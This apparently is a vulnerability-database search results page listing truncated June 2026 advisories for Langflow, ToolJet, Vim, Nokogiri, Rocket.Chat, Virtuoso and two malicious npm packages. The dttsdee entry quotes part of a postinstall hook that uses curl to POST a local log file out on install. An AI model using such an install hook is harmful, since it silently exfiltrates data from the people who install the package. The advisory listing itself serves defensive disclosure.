19510 matches found

IBM Security Bulletins
added 2026/06/25 5:32 p.m. | 3 views

Security Bulletin: SSRF Vulnerability in Langflow OSS Legacy Components Bypasses Protection

Summary Langflow OSS versions = 1.9.3 contain SSRF vulnerability in legacy RSS Reader and SearXNG components that bypass SSRF protection introduced in v1.9.3. RSSReaderComponent calls requests.getself.rssurl directly on user input without validateurlforssrf check, completely bypassing protection...

CVSS 8.2 | AI score 5.9 | EPSS 0.00199
Exploits: 0 | Affected Software: 1
NVD
added 2026/06/25 5:16 p.m. | 12 views

CVE-2026-55411

ToolJet is the open-source foundation am AI-native platform for building and deploying internal tools, workflows and AI agents. Prior to 3.20.1780-lts, the authenticated endpoint POST /api/data-sources/decrypt returns the decrypted plaintext for any credential whose credentialid is supplied in th...

CVSS 6.8 | EPSS 0.00126
Exploits: 0 | References: 1
OSV
added 2026/06/25 5:6 p.m. | 4 views

MAL-2026-6466 Malicious code in gx-npm-feature-flags (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 7fcad1b944d9ceb92389673398df9f471911a788fe608774a3298c69900bb1c7 [email protected] is a dependency-confusion squat max-semver 99.99.99 on a gx--prefixed name to outrank a private internal package that...

AI score 5.8
Exploits: 0 | References: 2
OSV
added 2026/06/25 4:16 p.m. | 2 views

UBUNTU-CVE-2026-57451

Vim is an open source, command line text editor. Prior to 9.2.0670, gettextprops in src/textprop.c reads a uint16 property count stored inline after a line's text and returns it as the number of 32-byte textpropT entries that follow. The only check is a floor that guarantees room for a single...

CVSS 6.1 | AI score 5.8 | EPSS 0.00113
Exploits: 0 | References: 3
Debian CVE
added 2026/06/25 3:34 p.m. | 4 views

CVE-2026-55693

Vim is an open source, command line text editor. Prior to 9.2.0653, the treecountwords function in src/spellfile.c fills in the word-count fields of a spell-file word trie by walking it iteratively with a depth counter. The counter is bounded only by the trie structure itself; it is never checked...

CVSS 8.4 | AI score 5.8 | EPSS 0.00126
Exploits: 0
Debian CVE
added 2026/06/25 2:34 p.m. | 5 views

CVE-2026-57437

Nokogiri is an open source XML and HTML library for the Ruby programming language. Prior to 1.19.4, Nokogiri::XML::XPathContext did not keep its source document alive for garbage collection. If an XPathContext outlived its document and the document was collected, evaluating an XPath expression...

CVSS 6.3 | AI score 5.9 | EPSS 0.00312
Exploits: 0
OSSF Malicious Packages
added 2026/06/25 10:51 a.m. | 10 views

Malicious code in dttsdee (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 56d01c47d29d1f8f25a737be42dd77d02a2c13a00afb808740142197a79150e9 package.json declares a postinstall lifecycle script that runs automatically on npm install: curl -X POST -d "$cat /data/logs/monitor-2026-06-25.log"...

AI score 6
Exploits: 0 | References: 1
Nuclei
added 2026/06/25 5:45 a.m. | 16 views

ThinkPHP < 3.2.4 - Remote Code Execution

ThinkPHP before 3.2.4, as used in Open Source BMS v1.1.1 and other products, allows Remote Command Execution via the s parameter in index.php through the invokefunction functionality. id: CVE-2019-9082 info: name: ThinkPHP 3.2.4 - Remote Code Execution author: 0xanis severity: high description: |...

CVSS 9.3 | AI score 7.5 | EPSS 0.97419
Exploits: 8 | References: 5
NVD
added 2026/06/24 10:16 p.m. | 9 views

CVE-2026-55666

Rocket.Chat is an open-source, secure, fully customizable communications platform. Prior to 8.5.1, 8.4.4, 8.3.6, 8.2.6, 8.1.6, 8.0.7, and 7.10.13, in apps/meteor/app/apple/server/loginHandler.ts, handleIdentityToken parses a JWT issued by Apple during the OAuth flow. The try block checks for an...

CVSS 9.3 | EPSS 0.00295
Exploits: 0 | References: 1
RedhatCVE
added 2026/06/24 3:36 p.m. | 4 views

CVE-2025-61025

A flaw was found in virtuoso-opensource. Attackers can exploit this vulnerability by sending specially crafted SQL statements, which can lead to a Denial of Service (DoS). This issue impacts the availability of the affected system...

CVSS 7.5 | AI score 5.8 | EPSS 0.0035
Exploits: 0 | References: 4
Tenable Nessus
added 2026/06/24 12:0 a.m. | 7 views

Linux Distros Unpatched Vulnerability : CVE-2025-61022

The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - An issue in the sqlotbcolpreds component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements...

CVSS 7.5 | AI score 5.9 | EPSS 0.0035
Exploits: 0 | References: 3
EUVD
added 2026/06/23 6:31 p.m. | 7 views

EUVD-2025-210316

An issue in the sqlonaturaljoincond component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements...

AI score 5.9 | EPSS 0.0035
Exploits: 0 | References: 2
EUVD
added 2026/06/23 6:31 p.m. | 6 views

EUVD-2025-210317

An issue in the sqlotbcolpreds component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements...

CVSS 7.5 | AI score 5.9 | EPSS 0.0035
Exploits: 0 | References: 2
EUVD
added 2026/06/23 6:31 p.m. | 6 views

EUVD-2025-210313

An issue in the sqloplacedtset component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements...

CVSS 7.5 | AI score 5.9 | EPSS 0.00482
Exploits: 0 | References: 2
OSV
added 2026/06/23 6:17 p.m. | 5 views

DEBIAN-CVE-2025-61029

An issue in the sqlountry component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements...

CVSS 7.5 | AI score 5.8 | EPSS 0.0035
Exploits: 0 | References: 1
NVD
added 2026/06/23 5:16 p.m. | 5 views

CVE-2025-61025

An issue in the sslrqstget component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements...

CVSS 7.5 | EPSS 0.0035
Exploits: 0 | References: 1
OSV
added 2026/06/23 5:16 p.m. | 4 views

DEBIAN-CVE-2025-61022

An issue in the sqlotbcolpreds component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements...

CVSS 7.5 | AI score 5.8 | EPSS 0.0035
Exploits: 0 | References: 1
OSV
added 2026/06/23 5:16 p.m. | 4 views

DEBIAN-CVE-2025-61020

An issue in the sqlostripinjoin component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements...

CVSS 7.5 | AI score 5.8 | EPSS 0.00482
Exploits: 0 | References: 1
NVD
added 2026/06/23 5:16 p.m. | 10 views

CVE-2025-61028

An issue in the timettodt component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements...

CVSS 7.5 | EPSS 0.00482
Exploits: 0 | References: 4
NVD
added 2026/06/23 5:16 p.m. | 7 views

CVE-2025-61019

An issue in the sqlokeypartbest component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements...

CVSS 7.5 | EPSS 0.0035
Exploits: 0 | References: 1